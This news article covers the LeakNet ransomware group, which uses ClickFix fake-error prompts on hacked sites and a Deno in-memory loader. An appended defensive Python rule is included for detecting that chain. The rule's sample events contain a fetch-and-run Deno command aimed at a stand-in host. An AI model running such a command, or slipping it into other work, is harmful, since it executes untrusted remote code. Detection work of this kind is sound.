
LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader

Redakcja Pixelift (Pixelift editorial team)

Photo: The Hacker News

Cybercriminals behind the LeakNet ransomware have developed a new attack method that relies on the ClickFix social-engineering technique served from hacked websites. Instead of traditional malware distribution methods, the attackers deploy a Deno-based in-memory loader, which significantly complicates detection by conventional security systems. The attack works by luring users to compromised sites, where ClickFix, a fake technical-support prompt, is used as the attack vector. The Deno loader operates exclusively in RAM and leaves no traces on disk, making it virtually invisible to standard antivirus solutions. The incident highlights growing threats to organizations relying on traditional security models. Experts recommend transitioning to a ZTNA (Zero Trust Network Access) architecture, which removes the possibility of lateral movement in the network by establishing direct connections between users and individual applications. Such an approach significantly limits ransomware's spread potential even if a single access point is compromised.

Cybercriminals are always looking for new ways to bypass security. Now a group called LeakNet — known for ransomware operations — has found a method that is both simple and dangerously effective. Instead of traditional attacks on infrastructure, it uses ClickFix — a social engineering technique that involves convincing a user to run malicious code themselves. All of this happens on websites that hackers have previously compromised. This is a shift in cybercriminal tactics that shows that traditional methods — such as stealing login credentials — may be becoming increasingly unprofitable.

What is particularly concerning is that LeakNet uses Deno — a modern JavaScript runtime typically associated with legitimate programming — for this purpose. A loader written in Deno operates entirely in RAM, which means that traditional threat detection tools have difficulty detecting it. This is no longer an attack that can be blocked at the network firewall or simple antivirus level. This is a threat requiring a completely new approach to security.

The story of LeakNet is the story of a group that is not afraid to experiment. Their new arsenal is changing the threat landscape for Polish companies, particularly those that still rely on outdated security models.

ClickFix: When the User Opens the Door for the Attacker

ClickFix is a tactic that at first glance seems almost archaic — convincing a user to run a system command under the guise of solving a technical problem. However, its effectiveness is alarming. The user sees an error message that looks authentic and is asked to perform a simple action. Trusting the message, they copy the command and paste it into a terminal. Seconds later, their computer is infected.

What makes ClickFix particularly dangerous as executed by LeakNet is the fact that the entire threat comes from websites that the user visits normally. There is no phishing email here that could be filtered at the mail server level. There is also no suspicious link that would look odd. Instead, when a user visits a compromised website — sometimes popular, sometimes less well-known — they encounter a message warning them of a "security problem" or "infected system". Everything looks professional and trustworthy.

Security in this scenario depends on one factor: user awareness. But knowledge of threats in Polish companies remains at a low level. Surveys show that a significant portion of employees would not be able to distinguish an authentic system message from a fake one. For the LeakNet group, this means a huge opportunity for success.

It is also worth noting that ClickFix can be delivered in many ways. It can be a popup that appears on a website. It can also be a banner that looks like an official message from the website owner. Hackers can even manipulate the mobile version of a website so that the message appears on the user's smartphone — where it is even more difficult to assess the authenticity of the warning.

Deno Runtime: A New Weapon in the Cybercriminal Arsenal

Deno is a modern alternative to Node.js, created by Node.js creator Ryan Dahl. For most developers, it is simply a tool for writing faster, safer code. For cybercriminals, it is something else — it is an opportunity.

LeakNet uses Deno to create an in-memory loader — a program that runs exclusively in a computer's RAM. This means it creates no files on disk. Traditional antivirus solutions search for malicious files — they scan the disk, analyze executables, check signatures. But if the threat never reaches the disk, these tools are practically useless.

A loader written in Deno can execute arbitrary code directly in memory. In practice, this means that attackers can:

  • Download and run ransomware directly from the command server
  • Modify system behavior in real-time, without the need to install permanent components
  • Hide traces of their activity, because nothing is saved to disk
  • Bypass traditional threat detection tools that search for files

The fact that LeakNet chose Deno shows the growing sophistication of the group. This is no longer an attack that can be blocked by simple antivirus. This is an attack that requires deep skills in operating system security, memory process monitoring, and behavioral anomaly detection.

For Polish companies that still rely on traditional security solutions, this means that their systems could be infected without any visible sign of infection. Ransomware could be running in the background, encrypting data, and the system administrator would have no idea what is happening until it is too late.

Compromised Websites: Attack Infrastructure in Your Neighborhood

LeakNet does not build new infrastructure to conduct attacks. Instead, it takes over existing websites and uses them as a platform to distribute ClickFix. This approach has many advantages for attackers — websites are already known and trusted by users, which increases the chances that someone will click on the fake message.

The question is: how does LeakNet take over these websites? There are several possibilities. First, they can exploit known vulnerabilities in content management systems such as WordPress or Joomla. Second, they can purchase access to compromised servers on the dark market. Third, they can conduct attacks on website administrators to obtain their passwords.

For website owners in Poland, this should be a warning. If your website is taken over, you could unknowingly be distributing malware to thousands of users. Legal and reputational liability could be enormous. The Internal Security Agency (ABW) has already issued warnings about this type of attack — Polish internet infrastructure is increasingly being attacked.

What is worse, website owners may not know that their website has been compromised. Attackers can be very discreet — they can add ClickFix only for specific users, for example those visiting the site from specific countries or at specific times. This makes detecting the problem more difficult.

From Stolen Passwords to Social Engineering: The Evolution of LeakNet's Tactics

The history of ransomware groups shows a clear trend: the more security develops, the more advanced attacks become. LeakNet is no exception. The shift from traditional methods — such as stealing login credentials or zero-day exploits — to ClickFix shows that the group is adapting to the new security landscape.

Password theft makes sense when employees use weak passwords and when there is no multi-factor authentication. But more and more companies are implementing MFA, and passwords are becoming increasingly complex. ClickFix, on the other hand, does not require breaking any security systems — it only requires deceiving the user. This is much cheaper and more reliable.

LeakNet appears to be a group that understands that the future of cybercrime lies in social engineering rather than traditional technical attacks. This is concerning because social engineering can only be automated to a certain extent. It requires an understanding of human psychology, the ability to create credible scenarios, and the ability to adapt to new security trends.

For Polish organizations, this means that security training becomes as important as traditional technical tools. An employee who knows how to recognize a fake error message is more valuable to a company than the most expensive firewall.

Zero Trust Security: The Answer to Threats Like LeakNet

Traditional security models were based on the assumption that everything inside the corporate network is secure. If an employee was in the office, their computer was trusted. If a VPN connection was established, the traffic was secure. These assumptions no longer make sense in a world where employees work from home, use personal devices, and visit untrusted websites.

The Zero Trust approach changes this logic. Instead of trusting a device or network, the system verifies every user action in real-time. If an employee tries to access sensitive data, the system checks not only their identity, but also the state of their device, location, time of day, and other factors. If something looks suspicious, access is denied or additional authentication is required.

In the context of a LeakNet attack, Zero Trust could change the game. Even if a user ran malicious code from ClickFix, the system would detect it. The Deno loader would try to connect to the command server, but the Zero Trust system would block it because the connection would look suspicious. Ransomware would try to access files, but the system would check whether the user should actually have access to those files at that moment.

ZTNA (Zero Trust Network Access) is a more advanced form of Zero Trust that eliminates traditional network perimeters. Instead of VPN, which gives users access to the entire network, ZTNA gives access only to specific applications that the user needs. This greatly limits the possibility of lateral movement — the ability that attackers could use to spread across the network after gaining access to one computer.

Polish Infrastructure and Readiness for LeakNet Attacks

Poland is increasingly being attacked by ransomware groups. A 2023 ABW report showed that the number of security incidents in Polish organizations increased by more than 40 percent compared to the previous year. LeakNet is not yet known as a group that specializes in attacks on Poland, but it is only a matter of time.

Poland has several characteristics that make it an attractive target for cybercriminals. First, many Polish companies still use older systems and software that are not regularly updated. Second, awareness of security threats in Poland is lower than in the United States or Germany. Third, Polish critical infrastructure — such as power plants, hospitals, or banks — is a target for state-sponsored attackers.

For Polish companies, this means they must take threats like LeakNet seriously. This is no longer a matter of the future — it is a matter of the present. Companies that do not take action now will be at risk.

What specifically should Polish organizations do? First, they should implement tools to monitor processes in memory — traditional antivirus is not enough. Second, they should train employees on recognizing ClickFix and other social engineering tactics. Third, they should consider implementing ZTNA to limit the possibility of lateral movement. Fourth, they should have an incident response plan — because if an attack occurs, quick response can be the difference between a small loss and a catastrophe.

Technical Depth: How the Deno Loader Works in Practice

To truly understand the threat posed by LeakNet, it is worth taking a closer look at how their Deno loader works. The Deno runtime has several features that make it attractive to attackers. First, it is designed to run JavaScript code without the need for compilation. Second, it has access to operating system APIs, which allows it to perform arbitrary system operations. Third, it is less well-known than Node.js, which means fewer system administrators know how to monitor it.

A loader written in Deno can be loaded by ClickFix as follows. The user runs a command that downloads a Deno script from the attacker's server. The script is run directly in memory — it never reaches the disk. The loader then downloads the actual ransomware from the command server and runs it in memory as well. The ransomware begins encrypting the user's files.

The entire process takes only a few seconds. The system administrator may not notice anything suspicious until it is too late. Traditional threat detection tools may not detect anything because there are no files to scan. Even network traffic monitoring tools may have difficulty if the traffic is encrypted.

A Deno-based loader also has ways to hide from oversight. It can change its process name to look like other legitimate software. It can also manipulate system logs to remove evidence of its activity. All of this makes it a very dangerous tool in the hands of cybercriminals.
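As an added illustration of the "monitor processes in memory" recommendation above (this is example code written for this page, not part of the original article or of any vendor's product), the triage rule below scores Sysmon-style process-creation events for the ClickFix-to-Deno chain: a `deno` binary launched by an interactive parent (Run dialog, shell, browser) with a remote module URL from an unknown host and broad permissions. The event fields, the sample events and the `example.invalid` domain are constructed for the demonstration; the trusted-host allowlist is an assumption a SOC would tune.

```python
import re
import shlex
from typing import Iterable

# Parents that imply a human typed or pasted the command (Run dialog, shells, browsers).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "windowsterminal.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Module hosts a developer would legitimately pull from (assumed allowlist; tune per org).
TRUSTED_MODULE_HOSTS = {"deno.land", "jsr.io"}
# Flags that hand the script unrestricted access to the system.
BROAD_PERMS = {"-A", "--allow-all", "--allow-run"}
URL_RE = re.compile(r"^https?://([^/:]+)", re.IGNORECASE)

# Constructed sample telemetry (Sysmon Event ID 1 style fields), not real logs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\.deno\bin\deno.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "deno run -A https://example.invalid/loader.ts"},
    {"Image": r"C:\Users\dev\.deno\bin\deno.exe", "ParentImage": r"C:\Program Files\Code\Code.exe",
     "CommandLine": "deno run --allow-net ./server.ts"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
    {"Image": r"C:\Users\dev\.deno\bin\deno.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "deno run https://deno.land/std/http/file_server.ts"},
]

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def analyze(event: dict) -> dict:
    """Return the indicators triggered by one process-creation event and a verdict."""
    indicators = []
    # Name matching alone is weak (the article notes the loader can rename itself);
    # real telemetry should also key on image hash or signer.
    if basename(event["Image"]) not in {"deno", "deno.exe"}:
        return {"suspicious": False, "indicators": indicators}
    argv = shlex.split(event["CommandLine"], posix=False)
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        indicators.append("interactive_parent")
    if any(tok in BROAD_PERMS for tok in argv):
        indicators.append("broad_permissions")
    for tok in argv:
        m = URL_RE.match(tok.strip("\"'"))
        if m and m.group(1).lower() not in TRUSTED_MODULE_HOSTS:
            indicators.append("untrusted_remote_module")
            break
    # Require the remote-module indicator plus at least one corroborating signal,
    # so a developer running a local script or a known module host is not flagged.
    suspicious = "untrusted_remote_module" in indicators and len(indicators) >= 2
    return {"suspicious": suspicious, "indicators": indicators}

def triage(events: Iterable[dict]) -> list:
    """Return only the events the rule considers suspicious, with their indicators."""
    return [dict(e, **analyze(e)) for e in events if analyze(e)["suspicious"]]
```

Running `triage(SAMPLE_EVENTS)` flags only the first event; the developer launches and the known-host module pass.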

The Future: What Awaits Us Next?

LeakNet is just one of many groups experimenting with new tactics. Other ransomware groups are watching what LeakNet does, and if it succeeds, they will imitate it. ClickFix and Deno loader could become standard tools in the cybercriminal arsenal.

For the security industry, this means we must change the way we think about threats. Traditional tools — antivirus, firewall, IDS — are already insufficient. We must focus on behavioral anomaly detection, memory process monitoring, and Zero Trust implementation. We must also invest in employee education, because humans remain the weakest link in the security chain.

For Polish companies, this means they must act quickly. Attacks like LeakNet can spread rapidly, and Polish organizations may not be prepared. Companies that take action now — implementing ZTNA, training employees, and investing in modern threat detection tools — will be much better prepared for what awaits us in the future. For the rest, disappointment and significant financial losses await.
